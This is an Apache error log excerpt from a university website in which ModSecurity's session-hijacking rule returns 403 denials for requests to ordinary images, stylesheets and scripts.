[Mon Aug 28 09:04:45.391253 2023] [:error] [pid 38769] [client 125.164.19.22] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/kampus_mengajar_2023.png"] [unique_id "ZOwAvcCo-f0AAJdxrTMAAAAS"]
[Mon Aug 28 09:04:45.424134 2023] [:error] [pid 38683] [client 125.164.20.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/js/bootstrap-datepicker.js"] [unique_id "ZOwAvcCo-f0AAJcb5AMAAAAP"]
[Mon Aug 28 09:04:45.447532 2023] [:error] [pid 38771] [client 125.164.16.240] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fh-link.png"] [unique_id "ZOwAvcCo-f0AAJdzkLgAAAAU"]
[Mon Aug 28 09:04:45.469500 2023] [:error] [pid 38646] [client 125.164.17.201] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fe-link.png"] [unique_id "ZOwAvcCo-f0AAJb21F8AAAAB"]
[Mon Aug 28 09:04:45.476456 2023] [:error] [pid 38769] [client 125.164.20.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fkip-link.png"] [unique_id "ZOwAvcCo-f0AAJdxrTQAAAAS"]
[Mon Aug 28 09:04:45.477551 2023] [:error] [pid 38773] [client 125.164.20.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fisip-link.png"] [unique_id "ZOwAvcCo-f0AAJd1foAAAAAE"]
[Mon Aug 28 09:04:45.481369 2023] [:error] [pid 38774] [client 125.164.23.90] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/pasca-link.png"] [unique_id "ZOwAvcCo-f0AAJd2kdMAAAAH"]
[Mon Aug 28 09:04:45.493484 2023] [:error] [pid 38771] [client 125.164.20.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/akademik.png"] [unique_id "ZOwAvcCo-f0AAJdzkLkAAAAU"]
[Mon Aug 28 09:04:45.496423 2023] [:error] [pid 38769] [client 125.164.20.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/pendaftaran_online.png"] [unique_id "ZOwAvcCo-f0AAJdxrTUAAAAS"]
[Mon Aug 28 09:04:45.502864 2023] [:error] [pid 38727] [client 125.164.23.90] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/digilib-logo.png"] [unique_id "ZOwAvcCo-f0AAJdH0EwAAAAI"]
[Mon Aug 28 09:04:45.519514 2023] [:error] [pid 38774] [client 125.164.19.22] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/rekrut_dosen.jpg"] [unique_id "ZOwAvcCo-f0AAJd2kdQAAAAH"]
[Mon Aug 28 09:04:45.534702 2023] [:error] [pid 38771] [client 125.164.23.90] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/ratri_tiara2023.png"] [unique_id "ZOwAvcCo-f0AAJdzkLoAAAAU"]
[Mon Aug 28 09:04:45.596765 2023] [:error] [pid 38765] [client 125.164.21.92] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/ft-link.png"] [unique_id "ZOwAvcCo-f0AAJdtodEAAAAO"]
[Mon Aug 28 09:04:45.623321 2023] [:error] [pid 38683] [client 125.164.16.240] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/login-email-unla.png"] [unique_id "ZOwAvcCo-f0AAJcb5AQAAAAP"]
[Mon Aug 28 09:04:45.682860 2023] [:error] [pid 38769] [client 125.164.18.121] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOwAvcCo-f0AAJdxrTYAAAAS"]
[Mon Aug 28 09:04:59.527633 2023] [:error] [pid 38773] [client 125.164.19.245] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOwAy8Co-f0AAJd1foEAAAAE"]
[Mon Aug 28 09:06:13.636060 2023] [:error] [pid 38765] [client 114.122.110.173] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "tpa-online.unla.ac.id"] [uri "/auth"] [unique_id "ZOwBFcCo-f0AAJdtodUAAAAO"]
[Mon Aug 28 09:06:13.932838 2023] [:error] [pid 38763] [client 114.122.110.173] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "tpa-online.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOwBFcCo-f0AAJdrnmsAAAAK"]
[Mon Aug 28 09:06:27.272984 2023] [:error] [pid 38773] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/scripts.js"] [unique_id "ZOwBI8Co-f0AAJd1foUAAAAE"]
[Mon Aug 28 09:06:27.273660 2023] [:error] [pid 38765] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery-1.4.4.min.js"] [unique_id "ZOwBI8Co-f0AAJdtodoAAAAO"]
[Mon Aug 28 09:06:27.309010 2023] [:error] [pid 38764] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.ScrollTo.js"] [unique_id "ZOwBI8Co-f0AAJdscKsAAAAM"]
[Mon Aug 28 09:06:27.331984 2023] [:error] [pid 38763] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/AC_RunActiveContent.js"] [unique_id "ZOwBI8Co-f0AAJdrnm0AAAAK"]
[Mon Aug 28 09:06:27.358495 2023] [:error] [pid 38688] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/css/Spinner.css"] [unique_id "ZOwBI8Co-f0AAJcg6gQAAAAD"]
[Mon Aug 28 09:06:27.359249 2023] [:error] [pid 38764] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/data-view.css"] [unique_id "ZOwBI8Co-f0AAJdscKwAAAAM"]
[Mon Aug 28 09:06:27.363238 2023] [:error] [pid 38774] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/fileuploadfield.css"] [unique_id "ZOwBI8Co-f0AAJd2kdcAAAAH"]
[Mon Aug 28 09:06:27.366124 2023] [:error] [pid 38769] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/examples.css"] [unique_id "ZOwBI8Co-f0AAJdxrT4AAAAS"]
[Mon Aug 28 09:06:27.475224 2023] [:error] [pid 38768] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/tabs.css"] [unique_id "ZOwBI8Co-f0AAJdwdPIAAAAA"]
[Mon Aug 28 09:06:27.488049 2023] [:error] [pid 38773] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/icons/silk.css"] [unique_id "ZOwBI8Co-f0AAJd1foYAAAAE"]
[Mon Aug 28 09:06:27.528863 2023] [:error] [pid 38683] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.mousewheel-3.0.4.pack.js"] [unique_id "ZOwBI8Co-f0AAJcb5AwAAAAP"]
[Mon Aug 28 09:06:27.529076 2023] [:error] [pid 38763] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.fancybox-1.3.4.js"] [unique_id "ZOwBI8Co-f0AAJdrnm4AAAAK"]
[Mon Aug 28 09:06:27.529417 2023] [:error] [pid 38765] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/treegrid/treegrid.css"] [unique_id "ZOwBI8Co-f0AAJdtodsAAAAO"]
[Mon Aug 28 09:06:27.534271 2023] [:error] [pid 38772] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.fancybox.settings.js"] [unique_id "ZOwBI8Co-f0AAJd0nlkAAAAC"]
[Mon Aug 28 09:06:27.540208 2023] [:error] [pid 38774] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/cufon-yui.js"] [unique_id "ZOwBI8Co-f0AAJd2kdgAAAAH"]
[Mon Aug 28 09:06:27.575831 2023] [:error] [pid 38764] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/Sansation_300-Sansation_700.font.js"] [unique_id "ZOwBI8Co-f0AAJdscK0AAAAM"]
[Mon Aug 28 09:06:27.584225 2023] [:error] [pid 38683] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/ddsmoothmenu.js"] [unique_id "ZOwBI8Co-f0AAJcb5A0AAAAP"]
[Mon Aug 28 09:06:27.584632 2023] [:error] [pid 38763] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/ddsmoothmenu.settings.js"] [unique_id "ZOwBI8Co-f0AAJdrnm8AAAAK"]
[Mon Aug 28 09:06:27.591586 2023] [:error] [pid 38765] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.nivo.slider.settings.js"] [unique_id "ZOwBI8Co-f0AAJdtodwAAAAO"]
[Mon Aug 28 09:06:27.591920 2023] [:error] [pid 38774] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.nivo.slider.pack.js"] [unique_id "ZOwBI8Co-f0AAJd2kdkAAAAH"]
[Mon Aug 28 09:06:27.621713 2023] [:error] [pid 38773] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/aslider.js"] [unique_id "ZOwBI8Co-f0AAJd1focAAAAE"]
[Mon Aug 28 09:06:27.625250 2023] [:error] [pid 38683] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/slidingboxes.js"] [unique_id "ZOwBI8Co-f0AAJcb5A4AAAAP"]
[Mon Aug 28 09:06:27.626234 2023] [:error] [pid 38763] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/supersleight.plugin.js"] [unique_id "ZOwBI8Co-f0AAJdrnnAAAAAK"]
[Mon Aug 28 09:06:27.627257 2023] [:error] [pid 38764] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/styleswitch.js"] [unique_id "ZOwBI8Co-f0AAJdscK4AAAAM"]
[Mon Aug 28 09:06:27.636853 2023] [:error] [pid 38765] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/adapter/ext/ext-base.js"] [unique_id "ZOwBI8Co-f0AAJdtod0AAAAO"]
[Mon Aug 28 09:06:27.673197 2023] [:error] [pid 38774] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ext-all.js"] [unique_id "ZOwBI8Co-f0AAJd2kdoAAAAH"]
[Mon Aug 28 09:06:27.677147 2023] [:error] [pid 38772] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/application/frontend/find_m.js"] [unique_id "ZOwBI8Co-f0AAJd0nloAAAAC"]
[Mon Aug 28 09:06:27.677349 2023] [:error] [pid 38768] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/application/frontend/store/DataMasterPublic.js"] [unique_id "ZOwBI8Co-f0AAJdwdPMAAAAA"]
[Mon Aug 28 09:06:27.677577 2023] [:error] [pid 38688] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/application/frontend/pendaftaran/verifikasipmb_form.js"] [unique_id "ZOwBI8Co-f0AAJcg6gUAAAAD"]
[Mon Aug 28 09:06:27.680018 2023] [:error] [pid 38763] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/Ext.ux.grid.Search.js"] [unique_id "ZOwBI8Co-f0AAJdrnnEAAAAK"]
[Mon Aug 28 09:06:27.682110 2023] [:error] [pid 38764] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/form/NumberField.js"] [unique_id "ZOwBI8Co-f0AAJdscK8AAAAM"]
[Mon Aug 28 09:06:27.733708 2023] [:error] [pid 38683] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/css/Spinner.css"] [unique_id "ZOwBI8Co-f0AAJcb5A8AAAAP"]
[Mon Aug 28 09:06:27.735749 2023] [:error] [pid 38773] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/data-view.css"] [unique_id "ZOwBI8Co-f0AAJd1fogAAAAE"]
[Mon Aug 28 09:06:27.736613 2023] [:error] [pid 38774] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/fileuploadfield.css"] [unique_id "ZOwBI8Co-f0AAJd2kdsAAAAH"]
[Mon Aug 28 09:06:27.737396 2023] [:error] [pid 38764] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/examples.css"] [unique_id "ZOwBI8Co-f0AAJdscLAAAAAM"]
[Mon Aug 28 09:06:27.745665 2023] [:error] [pid 38768] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/tabs.css"] [unique_id "ZOwBI8Co-f0AAJdwdPQAAAAA"]
[Mon Aug 28 09:06:27.747941 2023] [:error] [pid 38688] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/icons/silk.css"] [unique_id "ZOwBI8Co-f0AAJcg6gYAAAAD"]
[Mon Aug 28 09:06:27.782477 2023] [:error] [pid 38765] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/treegrid/treegrid.css"] [unique_id "ZOwBI8Co-f0AAJdtod4AAAAO"]
[Mon Aug 28 09:06:27.790673 2023] [:error] [pid 38764] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/application/frontend/website/ftracerstudy.js"] [unique_id "ZOwBI8Co-f0AAJdscLEAAAAM"]
[Mon Aug 28 09:06:27.944467 2023] [:error] [pid 38772] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/register-online.jpg"] [unique_id "ZOwBI8Co-f0AAJd0nlsAAAAC"]
[Mon Aug 28 09:06:27.945364 2023] [:error] [pid 38763] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/menu.css"] [unique_id "ZOwBI8Co-f0AAJdrnnIAAAAK"]
[Mon Aug 28 09:06:27.945591 2023] [:error] [pid 38688] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/dark.css"] [unique_id "ZOwBI8Co-f0AAJcg6gcAAAAD"]
[Mon Aug 28 09:06:28.010821 2023] [:error] [pid 38764] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/images/bg45.png"] [unique_id "ZOwBJMCo-f0AAJdscLIAAAAM"]
[Mon Aug 28 09:06:28.013535 2023] [:error] [pid 38774] [client 36.68.53.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/logo.png"] [unique_id "ZOwBJMCo-f0AAJd2kdwAAAAH"]
